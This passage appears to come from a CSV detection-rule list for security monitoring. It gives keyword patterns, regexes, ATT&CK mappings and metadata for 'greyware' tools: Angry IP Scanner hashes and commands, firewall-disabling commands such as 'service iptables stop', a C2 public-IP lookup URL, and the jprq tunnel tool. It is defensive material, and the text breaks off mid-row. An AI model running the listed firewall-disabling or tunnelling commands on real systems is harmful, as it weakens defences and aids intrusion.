"*e76cf4f44dc62c008bb203fa88eb3e942e7f28dafe6a264d2f5970a8befa142f*",".{0,1000}e76cf4f44dc62c008bb203fa88eb3e942e7f28dafe6a264d2f5970a8befa142f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e90254549780eb809f13048dbbea4ee473e0ee4aa0d506d89c463881cd6351c1*",".{0,1000}e90254549780eb809f13048dbbea4ee473e0ee4aa0d506d89c463881cd6351c1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*e9b267aac8adfc7fd11d83c4e6a7efa9940c338207da988b2429d61764fa485d*",".{0,1000}e9b267aac8adfc7fd11d83c4e6a7efa9940c338207da988b2429d61764fa485d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ea78a37a389c32e94aafe2115a8d75948b21cee204a5a89b64febd9f18932609*",".{0,1000}ea78a37a389c32e94aafe2115a8d75948b21cee204a5a89b64febd9f18932609.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*ea8792c7e11cad017c54c50f880e487f09581fd2d7f24ab453118ccf35716357*",".{0,1000}ea8792c7e11cad017c54c50f880e487f09581fd2d7f24ab453118ccf35716357.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*eb272642328677b4aef6922f2d845fb6d3e6ba3e0ce1f6b10867c9726f6076a4*",".{0,1000}eb272642328677b4aef6922f2d845fb6d3e6ba3e0ce1f6b10867c9726f6076a4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*eb6aa78a64ba7c6ed9341855d3aef5742ab13948b6cd445e9c715260f8d10dcb*",".{0,1000}eb6aa78a64ba7c6ed9341855d3aef5742ab13948b6cd445e9c715260f8d10dcb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*eb91b66cced883e4445f8e26fbf33689c82d04f5c736866d08d00847bb46b1f8*",".{0,1000}eb91b66cced883e4445f8e26fbf33689c82d04f5c736866d08d00847bb46b1f8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*ecbbcf4b40a507200f72493409d2a0fd22ba7958fca6121679a0b9c2441001a5*",".{0,1000}ecbbcf4b40a507200f72493409d2a0fd22ba7958fca6121679a0b9c2441001a5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ed8e23f58c3539380673c26d1ed265f703207cc2866f6c3e9e004859a0a559e5*",".{0,1000}ed8e23f58c3539380673c26d1ed265f703207cc2866f6c3e9e004859a0a559e5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ee35e912fdc0dbc8ce07822ab1899f7f4b85e8113e3e1b743b0a303924cd6b22*",".{0,1000}ee35e912fdc0dbc8ce07822ab1899f7f4b85e8113e3e1b743b0a303924cd6b22.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ee95cc2e9d7a6b048cc0637fab30cee273ee5b0fb144759b25dfc55f5f5434f4*",".{0,1000}ee95cc2e9d7a6b048cc0637fab30cee273ee5b0fb144759b25dfc55f5f5434f4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*eedf9170ab629a168f92f914dd1e633516ff6b7f8df56b1f459a08d906a29e73*",".{0,1000}eedf9170ab629a168f92f914dd1e633516ff6b7f8df56b1f459a08d906a29e73.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*f63a9a1bff8841613c2f8c0ba7582631b89f4ee7cb0d03b59daa806a8a79ccd5*",".{0,1000}f63a9a1bff8841613c2f8c0ba7582631b89f4ee7cb0d03b59daa806a8a79ccd5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*f7bb32eb31cc17a691592f1944f8293b247833f39703e7521f92ca230bb6c220*",".{0,1000}f7bb32eb31cc17a691592f1944f8293b247833f39703e7521f92ca230bb6c220.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*f839c9b6fcec3e97ee042604a00edddda9262985a6768a4e16f4dac8eb8d8238*",".{0,1000}f839c9b6fcec3e97ee042604a00edddda9262985a6768a4e16f4dac8eb8d8238.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*f8a6470914148f0fc254ea773d4dfc870b1324953165fb619b2cac985418ab06*",".{0,1000}f8a6470914148f0fc254ea773d4dfc870b1324953165fb619b2cac985418ab06.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*f8da6811a00fd70fbd31ba8532cab47c95d53e675582364cf5d6fb9d484977bc*",".{0,1000}f8da6811a00fd70fbd31ba8532cab47c95d53e675582364cf5d6fb9d484977bc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*f8def6c6c62783ce0b607d4bb55089b8083f052e1b2da4db1708dd494964b123*",".{0,1000}f8def6c6c62783ce0b607d4bb55089b8083f052e1b2da4db1708dd494964b123.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*f9432ce52449b2bf1d0b92046f1ea0dde1f306740533888c2ff3f190f10be1c2*",".{0,1000}f9432ce52449b2bf1d0b92046f1ea0dde1f306740533888c2ff3f190f10be1c2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*fa4cdff048c350043700888dcb50a6a5fa1e1dcfd24a86b1942b0d378912e0a4*",".{0,1000}fa4cdff048c350043700888dcb50a6a5fa1e1dcfd24a86b1942b0d378912e0a4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*faf8cbecf71ca34708fbd7cfdbda9ca81476a29f7dd8f58e1e35bc64b58e8528*",".{0,1000}faf8cbecf71ca34708fbd7cfdbda9ca81476a29f7dd8f58e1e35bc64b58e8528.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*fc4ae0ea29ccdbfb58ac8ee898beae752e1a3e8528e94c02630c9bf34637dadd*",".{0,1000}fc4ae0ea29ccdbfb58ac8ee898beae752e1a3e8528e94c02630c9bf34637dadd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*fce6c490393cd886beb5859fe7cecfab805098c1f2db88c290209681ee53bf50*",".{0,1000}fce6c490393cd886beb5859fe7cecfab805098c1f2db88c290209681ee53bf50.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*fd68dceff58851ac4a8ba8ad476cd72f3fc0b3e62ada8ee355157f677ea67b07*",".{0,1000}fd68dceff58851ac4a8ba8ad476cd72f3fc0b3e62ada8ee355157f677ea67b07.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*fda286756bd8b976139dfd1dc8e80532af74d8b628d69850d29335dd6d1a44dd*",".{0,1000}fda286756bd8b976139dfd1dc8e80532af74d8b628d69850d29335dd6d1a44dd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*fdc0f0e9a4cdb1f3533ea2bc643907365556bbb7386645bb143942e60beefab4*",".{0,1000}fdc0f0e9a4cdb1f3533ea2bc643907365556bbb7386645bb143942e60beefab4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*fdde0e3af2596af6e1952bf4fc050dc4a5bd73c2826775b758fcdca93f91c134*",".{0,1000}fdde0e3af2596af6e1952bf4fc050dc4a5bd73c2826775b758fcdca93f91c134.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*fe57ef744c2f42fa72573f27e8dffefded238722eaeaeecfcbaaab239c4a07c4*",".{0,1000}fe57ef744c2f42fa72573f27e8dffefded238722eaeaeecfcbaaab239c4a07c4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ff82293d001f120a624d0b71dc57432f4cbbd813078d4092685f62246b12a918*",".{0,1000}ff82293d001f120a624d0b71dc57432f4cbbd813078d4092685f62246b12a918.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ipscan 1*.255*",".{0,1000}ipscan\s1.{0,1000}\.255.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ipscan 10.*",".{0,1000}ipscan\s10\..{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ipscan 172.*",".{0,1000}ipscan\s172\..{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ipscan 192.168.*",".{0,1000}ipscan\s192\.168\..{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ipscan.exe -*",".{0,1000}ipscan\.exe\s\-.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ipscan-win64-*.exe*",".{0,1000}ipscan\-win64\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","1","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*MacOS/ipscan -*",".{0,1000}MacOS\/ipscan\s\-.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*chkconfig off ip6tables*","chkconfig\soff\sip6tables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*chkconfig off iptables*","chkconfig\soff\siptables","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*service ip6tables stop*","service\sip6tables\sstop","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*service iptables stop*","service\siptables\sstop","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A" "*https://ipv4.myip.wtf/text*",".{0,1000}https\:\/\/ipv4\.myip\.wtf\/text.{0,1000}","greyware_tool_keyword","ipv4.myip.wtf","get public ip address. Used by disctopia-c2","T1016 - T1071.001","TA0005 - TA0002","N/A","N/A","Reconnaissance","https://github.com/3ct0s/disctopia-c2/blob/main/libraries/disctopia.py","1","1","N/A","greyware_tools high risks of false positives","N/A","10","498","118","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z" "*/RedTeaming-Tactics-and-Techniques.git*",".{0,1000}\/RedTeaming\-Tactics\-and\-Techniques\.git.{0,1000}","greyware_tool_keyword","ired.team","Red Teaming Tactics and Techniques","T1593.003","TA0043","N/A","N/A","Reconnaissance","https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques","1","1","N/A","N/A","7","10","3960","1038","2024-08-22T07:17:31Z","2019-03-02T13:33:33Z" "*\RedTeaming-Tactics-and-Techniques-master*",".{0,1000}\\RedTeaming\-Tactics\-and\-Techniques\-master.{0,1000}","greyware_tool_keyword","ired.team","Red Teaming Tactics and Techniques","T1593.003","TA0043","N/A","N/A","Reconnaissance","https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques","1","0","N/A","N/A","7","10","3960","1038","2024-08-22T07:17:31Z","2019-03-02T13:33:33Z" "*mantvydasb/RedTeaming-Tactics-and-Techniques*",".{0,1000}mantvydasb\/RedTeaming\-Tactics\-and\-Techniques.{0,1000}","greyware_tool_keyword","ired.team","Red Teaming Tactics and 
Techniques","T1593.003","TA0043","N/A","N/A","Reconnaissance","https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques","1","1","N/A","N/A","7","10","3960","1038","2024-08-22T07:17:31Z","2019-03-02T13:33:33Z" "*www.ired.team*",".{0,1000}www\.ired\.team.{0,1000}","greyware_tool_keyword","ired.team","Red Teaming Tactics and Techniques","T1593.003","TA0043","N/A","N/A","Reconnaissance","https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques","1","1","N/A","N/A","7","10","3960","1038","2024-08-22T07:17:31Z","2019-03-02T13:33:33Z" "* jprq-windows-386.exe*",".{0,1000}\sjprq\-windows\-386\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "* jprq-windows-amd64.exe*",".{0,1000}\sjprq\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/etc/letsencrypt/live/jprq.site/*",".{0,1000}\/etc\/letsencrypt\/live\/jprq\.site\/.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq.git*",".{0,1000}\/jprq\.git.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq.log*",".{0,1000}\/jprq\.log.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq.service*",".{0,1000}\/jprq\.service.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq/server/*.go*",".{0,1000}\/jprq\/server\/.{0,1000}\.go.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq-darwin-arm64*",".{0,1000}\/jprq\-darwin\-arm64.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq-linux-386*",".{0,1000}\/jprq\-linux\-386.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq-linux-arm64*",".{0,1000}\/jprq\-linux\-arm64.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq-windows-386.exe*",".{0,1000}\/jprq\-windows\-386\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/jprq-windows-amd64.exe*",".{0,1000}\/jprq\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/root/jprq-server*",".{0,1000}\/root\/jprq\-server.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/usr/local/bin/jprq*",".{0,1000}\/usr\/local\/bin\/jprq.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*/var/log/jprq/*",".{0,1000}\/var\/log\/jprq\/.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*\jprq-windows-386.exe*",".{0,1000}\\jprq\-windows\-386\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*\jprq-windows-amd64.exe*",".{0,1000}\\jprq\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*>jprq - join public router*",".{0,1000}\>jprq\s\-\sjoin\spublic\srouter.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*01713b6ae56ab0f1faf7834f29c22fb36c41bef9c6cf2b702dc3f617513c3be6*",".{0,1000}01713b6ae56ab0f1faf7834f29c22fb36c41bef9c6cf2b702dc3f617513c3be6.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*0cfa716d39fc90ed0c4db1bd68f1b4b791f26e5fab4003ae9b816d1f7d68d208*",".{0,1000}0cfa716d39fc90ed0c4db1bd68f1b4b791f26e5fab4003ae9b816d1f7d68d208.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*0d05bed47cc1579a068f83123a502c59d447b20a5318c1d70ffb7a0b638a7aff*",".{0,1000}0d05bed47cc1579a068f83123a502c59d447b20a5318c1d70ffb7a0b638a7aff.{0,1000}","greyware_tool_keyword","jprq","expose TCP 